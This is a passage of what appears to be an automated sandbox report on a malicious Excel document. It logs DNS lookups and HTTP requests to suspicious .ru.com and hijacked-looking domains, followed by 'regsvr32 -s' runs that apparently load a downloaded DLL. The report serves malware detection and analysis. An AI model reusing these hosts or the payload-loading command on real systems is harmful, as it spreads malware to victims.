                                                                                                                                                                      Apr 9, 2021 16:32:51.726483107 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.887449026 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.887571096 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:51.888139963 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.048655987 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054092884 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054116964 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054127932 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054191113 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.054413080 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.068753004 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.229655981 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.229747057 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.230861902 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.435995102 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.817079067 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.817186117 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.817459106 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.817528009 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.847177029 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.020139933 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.021712065 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.022327900 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.194963932 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195327997 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195377111 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195414066 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195450068 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195480108 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.195554972 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.195559978 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.197325945 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.201728106 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.234844923 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.407876015 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.408828974 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.409564972 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.625683069 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.689618111 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.689646006 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.689744949 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.690171957 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.862592936 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:22.817353964 CEST4434970967.222.38.97192.168.2.5

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Apr 9, 2021 16:32:33.274650097 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:33.288738012 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:33.471756935 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:33.484988928 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:34.134174109 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:34.148879051 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:35.371589899 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:35.385628939 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:36.164657116 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:36.182590008 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:36.822885036 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:36.835565090 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:37.795372963 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:37.808442116 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:38.639306068 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:38.652040005 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:44.875857115 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:44.893810987 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:45.739701033 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:45.752399921 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:45.848380089 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:45.895380020 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:46.233835936 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:46.266985893 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:47.235687017 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:47.249058962 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:48.235239029 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:48.269509077 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:49.100858927 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:49.116050959 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:49.320487022 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:49.617819071 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:50.028651953 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:50.035092115 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:50.041322947 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:50.048213959 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:50.248240948 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:50.262741089 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:50.468092918 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:50.628273964 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.603812933 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:51.722814083 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.824796915 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:52.844868898 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:54.264189959 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:32:54.278040886 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:04.091212988 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:04.278136969 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:05.660773993 CEST5973653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:05.660993099 CEST5105853192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:05.661112070 CEST5263653192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:05.673764944 CEST53510588.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:05.673964024 CEST53526368.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:05.673985004 CEST53597368.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:06.644540071 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:06.658512115 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:06.809588909 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:06.828172922 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:07.964963913 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:07.995057106 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:09.542166948 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:09.554812908 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:17.899082899 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:17.918118954 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:27.776884079 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:27.789747953 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:46.730371952 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:46.743416071 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:58.165067911 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:58.186606884 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:34:07.641311884 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:34:07.654872894 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:34:16.440901041 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:34:16.468780994 CEST53544508.8.8.8192.168.2.5

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Apr 9, 2021 16:32:49.320487022 CEST192.168.2.58.8.8.80x19d7Standard query (0)runolfsson-jayde07s.ru.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:50.035092115 CEST192.168.2.58.8.8.80x62adStandard query (0)cremin-ian07u.ru.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:50.468092918 CEST192.168.2.58.8.8.80x4440Standard query (0)shalombaptistchapel.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:51.603812933 CEST192.168.2.58.8.8.80xfd97Standard query (0)cesiroinsurance.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:52.824796915 CEST192.168.2.58.8.8.80xa4e4Standard query (0)innermetransformation.comA (IP address)IN (0x0001)

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Apr 9, 2021 16:32:49.617819071 CEST8.8.8.8192.168.2.50x19d7No error (0)runolfsson-jayde07s.ru.com8.211.4.209A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:50.048213959 CEST8.8.8.8192.168.2.50x62adNo error (0)cremin-ian07u.ru.com8.211.4.209A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:50.628273964 CEST8.8.8.8192.168.2.50x4440No error (0)shalombaptistchapel.com162.251.80.27A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:51.722814083 CEST8.8.8.8192.168.2.50xfd97No error (0)cesiroinsurance.com67.222.38.97A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:32:52.844868898 CEST8.8.8.8192.168.2.50xa4e4No error (0)innermetransformation.com173.201.252.173A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:33:06.828172922 CEST8.8.8.8192.168.2.50x7ad2No error (0)api.globalsign.cloud104.18.25.243A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 9, 2021 16:33:06.828172922 CEST8.8.8.8192.168.2.50x7ad2No error (0)api.globalsign.cloud104.18.24.243A (IP address)IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • runolfsson-jayde07s.ru.com
                                                                                                                                                                      • cremin-ian07u.ru.com

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.5497058.211.4.20980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 9, 2021 16:32:49.638366938 CEST1231OUTGET /ind.html HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                      Host: runolfsson-jayde07s.ru.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Apr 9, 2021 16:32:50.025616884 CEST1236INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                      Date: Fri, 09 Apr 2021 14:32:49 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                      X-Powered-By: PHP/5.4.16
                                                                                                                                                                      Content-Length: 76
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                                      Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.5497078.211.4.20980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Apr 9, 2021 16:32:50.068398952 CEST1238OUTGET /ind.html HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                      Host: cremin-ian07u.ru.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Apr 9, 2021 16:32:50.458079100 CEST1243INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                      Date: Fri, 09 Apr 2021 14:32:50 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                      X-Powered-By: PHP/5.4.16
                                                                                                                                                                      Content-Length: 76
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                                      Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.


                                                                                                                                                                      HTTPS Packets

                                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                      Apr 9, 2021 16:32:50.934982061 CEST162.251.80.27443192.168.2.549708CN=autodiscover.shalombaptistchapel.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Feb 13 12:43:03 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri May 14 13:43:03 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                      Apr 9, 2021 16:32:52.054127932 CEST67.222.38.97443192.168.2.549709CN=www.cesiroinsurance.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Feb 15 21:11:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun May 16 22:11:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                      Apr 9, 2021 16:32:53.197325945 CEST173.201.252.173443192.168.2.549710CN=innermetransformation.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Tue Jun 01 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                      CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                                      CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:44
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                      Imagebase:0x290000
                                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:53
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:regsvr32 -s ..\ghnrope
                                                                                                                                                                      Imagebase:0x12f0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:53
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:regsvr32 -s
                                                                                                                                                                      Imagebase:0x12f0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:53
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:regsvr32 -s
                                                                                                                                                                      Imagebase:0x12f0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:54
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:regsvr32 -s
                                                                                                                                                                      Imagebase:0x12f0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:55
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:regsvr32 -s
                                                                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                      Reset < >